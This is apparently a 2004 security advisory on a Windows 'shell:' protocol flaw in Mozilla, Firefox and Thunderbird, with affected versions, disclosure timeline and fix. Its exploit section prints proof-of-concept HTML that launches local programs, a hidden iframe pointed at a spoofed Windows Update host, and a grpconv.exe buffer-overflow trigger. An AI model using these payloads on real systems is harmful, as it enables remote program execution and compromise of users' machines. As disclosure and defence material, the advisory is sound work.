Windows versions of Mozilla products pass URIs using the shell: scheme to the OS for handling. The effects depend on the version of Windows, but on Windows XP it is possible to launch executables in known locations or the default handlers for file extensions. It could be possible to combine this effect with a known buffer overrun in one of these programs to create a remote execution exploit, although at this time we have confirmed only denial-of-service type attacks (including crashing the system in some cases).
Vulnerable Systems:
* Mozilla (Suite) version 1.7.0 and prior
* Mozilla Firefox version 0.9.1 and prior
* Mozilla Thunderbird version 0.7.1 and prior
Immune Systems:
* Mozilla (Suite) version 1.7.1
* Mozilla Firefox version 0.9.2
* Mozilla Thunderbird version 0.7.2
On July 7 a security vulnerability affecting browsers for the Windows operating system was reported to mozilla.org by Keith McCanless, and was subsequently posted to Full Disclosure, a public security mailing list. On the same day, the Mozilla security team confirmed the report of this security issue affecting the Mozilla Application Suite, Firefox, and Thunderbird and discussed and developed the fix at Bugzilla bug 250180. We have confirmed that the bug affects only users of Microsoft's Windows operating system. The issue does not affect Linux or Macintosh users.
On July 8th, the Mozilla team released a configuration change that resolves this problem by explicitly disabling the use of the shell: external protocol handler. The fix is available in two forms. The first is a small download which will make this configuration adjustment for the user. The second fix is to install the newest full release of each of these products. Instructions on administering these changes can be found below.
Solution:
The Mozilla project urges people to install the patch available on mozilla.org or install the latest version of the software: http://www.mozilla.org/security/shell.html
Exploit:
The following HTML snippet can be used to run commands in the context of the user local zone. The vulnerability lies in the handling of the shell protocol that is inherently unsafe because it allows execution of commands. The browsers should restrict access to the shell protocol.
<center><br><br><img src="nocigar.gif"></center>
<center>
<a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
src="http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
[customize as you see fit]
<http://www.malware.com/stockpump.html>
The following commands are examples of how it is possible to run commands remotely: <a href=shell:windows\\system32\\calc.exe>1</a>
<a href=shell:windows\system32\calc.exe>2</a>
<a href=shell:windows\system32\winver.exe>4</a>
Saved as HTML and run, each of these launches an application on the target machine. In addition, the full path to the Windows system32 directory doesn't need to be known in advance since the shell interpreter automatically replaces it with the proper Windows base directory. In the HKEY_CLASSES_ROOT\Shell registry key one can see that the shell object invokes Windows Explorer with a specific set of arguments: %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
Since Mozilla allows access to the shell object, and that in turn is capable of running many commands, the issue is remotely exploitable. All an attacker has to do is find a program on the target machine that can be used to further compromise the system. A program that contains a local buffer overflow, for example. One such program found by Andreas Sandblad is the MSProgramGroup (WINDOWS\System32\grpconv.exe) with a command as follows: shell:[x*221].grp
The EIP register can be controlled but is a bit tricky to exploit since the parameter is stored as a UNICODE string. It is also very possible that other 3rd party programs will be susceptible to a buffer overflow and could aid the attacker in gaining access or compromising the machine.
